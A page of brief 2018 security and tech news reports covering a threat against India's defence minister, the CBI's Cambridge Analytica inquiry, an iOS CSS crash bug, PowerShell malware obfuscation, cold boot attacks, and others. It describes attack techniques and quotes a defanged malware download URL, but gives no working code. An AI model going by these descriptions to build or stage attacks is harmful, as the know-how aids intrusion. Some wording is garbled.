September 19, 2018

2 arrested in Uttarakhand for whatsapp char on killing Defence minister

Two persons were arrested on Monday from Uttarakhand over an exchange of messages on WhatsApp discussing a plan to allegedly kill Indian Defence Minister Nirmala Sitharaman during her visit to the state.

The minister paid a visit to Dharchula town of Pithoragarh district in Uttarakhand on Monday to inaugurate a mega medical camp organised by the Army on the occasion of Prime Minister Narendra Modi's birthday. His birthday is being celebrated as 'Seva Diwas'.

The police were alerted to the message at 9.30pm on Sunday. It is being probed whether the duo had any criminal background or possessed any arms and ammunition.

The two have been booked under Section 506 (criminal intimidation) of the IPC and Section 66 of the Information Technology (IT) Act, Pithoragarh SP Ramchandra Rajguru said. "We were alerted to the chat (about killing the defence minister) on a WhatsApp group at 9.30 pm on Sunday. We identified two persons between whom the chat was taking place and arrested them Monday morning ahead of the defence minister's arrival here," he said.

The controversial message sent by one of the arrested duo reads as, "Main shoot karunga Sitharaman ko, kal uska akhiri din hoga. ('I will shoot Sitharaman, tomorrow will be her last day')", police said.

The credentials of the admin of the WhatsApp group are also being looked into, the SP said. While the matter is still under investigation, Rajguru said that it appeared, prima facie, that the duo was drunk while they were chatting.
September 19, 2018

CBI writes to Facebook, Cambridge Analytica on illegal data harvesting

The Central Bureau of Investigation in India has written to Britain-based consultancy firm Cambridge Analytica, Global Science Research (GSR), and Facebook asking them to hand over the information regarding alleged data theft of Indian Facebook users.

“We have written to three firms separately to seek details regarding the allegations. Further investigation will take place after we receive a reply,” a CBI official said.

A month ago, the agency has sent letters to three companies after a reference from the Ministry of Electronics and Information Technology, in which they have sought the details of illegal data collection exercise adapted by them.

It is alleged that Global Science Research obtained the data and then supplied it to  Cambridge Analytica. According to the CBI officials, the GSR used “illegal means” to retrieve the personal data from Indian Facebook users.

Facebook has said that more than 20 crore users in India were affected by the data breach.

“Facebook responded that they will streamline their processes regarding personal data. They stated that the case of Cambridge Analytica was a case of breach of trust…” IT minister Ravi Shankar Prasad had said.

September 17, 2018

A new CSS snippet can crash and restart your iPhone, iPad

A security researcher has discovered a new way to crash and restart any iPhone or iPad devices instantly by using a simple few lines of code.

The code could be easily spread over email or through social media posts, once the Apple device user opens the snippet of code, the device will reboot without warning, as a result, the user would lose all the unsaved data.

A Berlin-based security researcher Sabri Haddouche wrote the 15 lines of code and shared it in a post on Twitter.

“Anything that renders HTML on iOS is affected,” he said. If someone sends you a code link on Facebook or Twitter, or email you, or through any medium, he warned.

The snippet exploits the flaw in Apple's operating system which tries to use all the available resources on your iOS device.  It results finally a panic on the kernel of the hardware and ultimately restarts the device.

Haddouche packaged the codes in Cascading Style Sheets (CSS) to form a snippet and it controls the way simple HTML code is displayed on a screen.

'The attack uses a weakness in the -webkit-backdrop-filter CSS property, which uses 3D acceleration to process elements behind them,' Mr Haddouche told ZDNet.

'By using nested DIVs with that property, we can quickly consume all graphic resources and freeze or kernel panic the OS.'

September 17, 2018

Obsfuscation: Another Cyber-crime Contrivance to Bypass Antivirus Software

A malware sample that was unearthed recently, goes about changing the overall signature when the final payload is delivered via the obfuscation technique which succeeds to dodge anti-virus facilities. This technique is a great way for the cyber-criminals to escape the anti-virus scan.

Most anti-virus products are dependent on the detection that uses signatures. The overall structure keeps on transforming, the functions don’t get altered, and an evasion layer is created that aids the malware to side-step the anti-virus detection.

The most common means of the obfuscation technique that is employed in avoiding the anti-virus are, Packers, which compresses or ‘packs’ a malware program, Crypters that encrypt a malware program and other mutators which change the overall number of bytes in the program.

PowerShell Obfuscation which is a technique distributed in the form of a ZIP file that contains a PDF document and a VBS script was stumbled upon by a researcher. It was later found out that the aforementioned VB script had the Base64 encoding principals that were being used to obfuscate the first layer. A file is then downloaded by means of the PowerShell script namely, “hxxps://ravigel[dot]com/1cr[dot]dat”.

A method of string encryption that goes by the name of SecureString which is intrinsic in C# and is used to encrypt sensitive strings was found out in the file that is of the name 1cr.dat.

An array of instructions is designed to beat the automated sandbox techniques and another PE file “” is downloaded after that by making use of the existing script and the final payload is injected into the target’s machine.

Security must be kept taut and the best methods should be employed to diminish the repercussions of such an attack. A complete DDoS protection, high availability, 99.999% SLA and advanced security solutions must be the top priorities for the organizations that can’t manage interruption.  

If a server which was already infected was uploaded with a malware, the interaction between the attacker and the backdoor could be stopped which in turn would alert the admin eventually helping to remove the malware.  

Web application firewalls, backdoor shell protections, and other solution must be worked out to put a halt for any future vulnerability and to isolate any further attack. 
September 17, 2018

Cold boot attacks can affect nearly all modern computers

Many people tend to put laptops to ‘Sleep’ instead of shutting it down. Whether you’re at home, or at your workplace, leaving desktops and laptops unattended might have become a habit. A cybersecurity firm discovered a way to access a laptop’s data even with full disk encryption. According to their findings, anyone with physical access to a high-value computer can steal sensitive data such as passwords, corporate files, and more, stored on your RAM via new cold boot attacks.

In their recent blog post, F-Secure disclosed a way to steal data stored on a laptop when left unattended. They described how an attacker can pilfer encryption keys along with all data from the laptop.

The attack only takes about five minutes to pull off, if the hacker has physical access to the computer, F-Secure principal security consultant Olle Segerdahl said in a statement Thursday. These attacks require special hardware tooling to perform, and are generally not considered a threat vector for normal users, but only for computers storing highly-sensitive information, or for high-value individuals such as government officials or businessmen. Cold boot attacks can steal data on a computer's RAM, where sensitive information is briefly stored after a forced reboot.

Earlier, attempts have been made to mitigate cold boot attacks by overwriting the RAM after power restoration. However, F-Secure security consultants, Olle Segerdahl and Pasi Saarinen, discovered a way to bypass such mitigations. Explaining their findings in the blog post, they state,

“The two experts figured out a way to disable this overwrite feature by physically manipulating the computer’s hardware. Using a simple tool, Olle and Pasi learned how to rewrite the non-volatile memory chip that contains these settings, disable memory overwriting, and enable booting from external devices. Cold boot attacks can then be carried out by booting a special program off a USB stick.”
September 16, 2018

Morgan Stanley to offer bitcoin swap trading

Another of the world’s largest investment banks is quietly building a product that will allow its clients to trade bitcoin, at least indirectly.

Morgan Stanley, the sixth-largest bank in the U.S. by assets, is joining Wall Street’s race toward an institutional-friendly bitcoin derivative, Bloomberg reported on Thursday, citing a person familiar with the matter. The financial institution is creating a proprietary derivatives product that will give traders “synthetic exposure” to the price of bitcoin. These derivatives would allow investors to indirectly invest in the market’s flagship currency, allotting them the option to buy into long or short positions through the contracts.

From the report:

“The U.S. bank will deal in contracts that give investors synthetic exposure to the performance of Bitcoin, said the person, who asked not to be identified because the information is private. Investors will be able to go long or short using the so-called price return swaps, and Morgan Stanley will charge a spread for each transaction, the person said.”

The report further indicated that Morgan Stanley, whose CEO — James Gorman — said earlier this year taking their prices from bitcoin futures, the swaps will not handle bitcoin directly through the bank. Seeing as Morgan Stanley is a regulated and established financial institution, tying the product to futures contracts is a safer bet than basing them on bitcoin’s spot price, as the Chicago Mercantile Exchange and Chicago Board of Exchange offer fully-regulated bitcoin futures from which Morgan Stanley can pool pricing data.

Bloomberg’s source claimed that the derivatives are ready for launch, but it’s waiting on an in-house approval process and sufficient investor demand before taking them to market.

However, Morgan Stanley’s spokesperson has declined to comment on the developments.

Last week, Business Insider reported that rival Goldman Sachs Group Inc was ditching plans to open a desk for trading cryptocurrencies, as the regulatory framework for crypto remains unclear.
September 16, 2018

Indian Air Force online exam hacked

A team of tech-savvy fraudsters hacked into an online exam for selection of non-commissioned  Indian Air force (IAF) officers in Rohtak.

While on Saturday, Rohtak police have arrested two people for allegedly hacking.

According to Jagbir Singh, the SHO of Rohtak city police station, the exam was held from September 13 to 16, and there are five computers that were hacked.

The exam was conducted by an agency which was outsourced by Centre for Development of Advanced Computing,  Singh said. The fiber cable of the exam center was laid from the first floor of an adjacent private hospital, he said.

The fraudsters were able to establish a remote access to computers used in the exam by setting up a parallel network. The team was helping candidates by giving them answers to the questions even they were just sitting idle in front of their computers.

The five hackers were found sitting with their laptops and sending exam questions to experts, the SHO said.

“Two men, who have been identified as masterminds of the entire racket and ran the exam center, are on the run,” said Singh. “They are J S Dahiya, a retired principal of the Jhajjar ITI, and his partner Sanjay Ahlwat, who runs a competitive exams’ coaching center."

However, the exact number of beneficiaries are not known, but the accused men charged between Rs 3.5 lakh and Rs 6 lakh from each candidate. 
September 15, 2018

Two Russian Spies detained in Netherlands and deported to the Russian Federation

In Netherlands at the beginning of the year, two Russian Spies were detained and deported to Russia on the way to Switzerland.

According to the media, two Russian Spies went to Switzerland to gain access to Spiez laboratory which helps to investigate chemical attacks in Syria and poisoning in Salisbury, which occurred in early 2018.

Moreover, the Russian hackers carried special equipment for penetration into computer networks. But they wouldn't be the first to try to hack into the lab's system. This laboratory has been attacked several times by hackers.

According to the Dutch newspaper "Handelsblad", this incident happened early this year, but the exact date of the detention of Russian spies is unknown.

The special services of the Netherlands, Switzerland and Great Britain detained Russian hackers. However, it remains unclear why the Russians were released and not brought to trial in the Netherlands.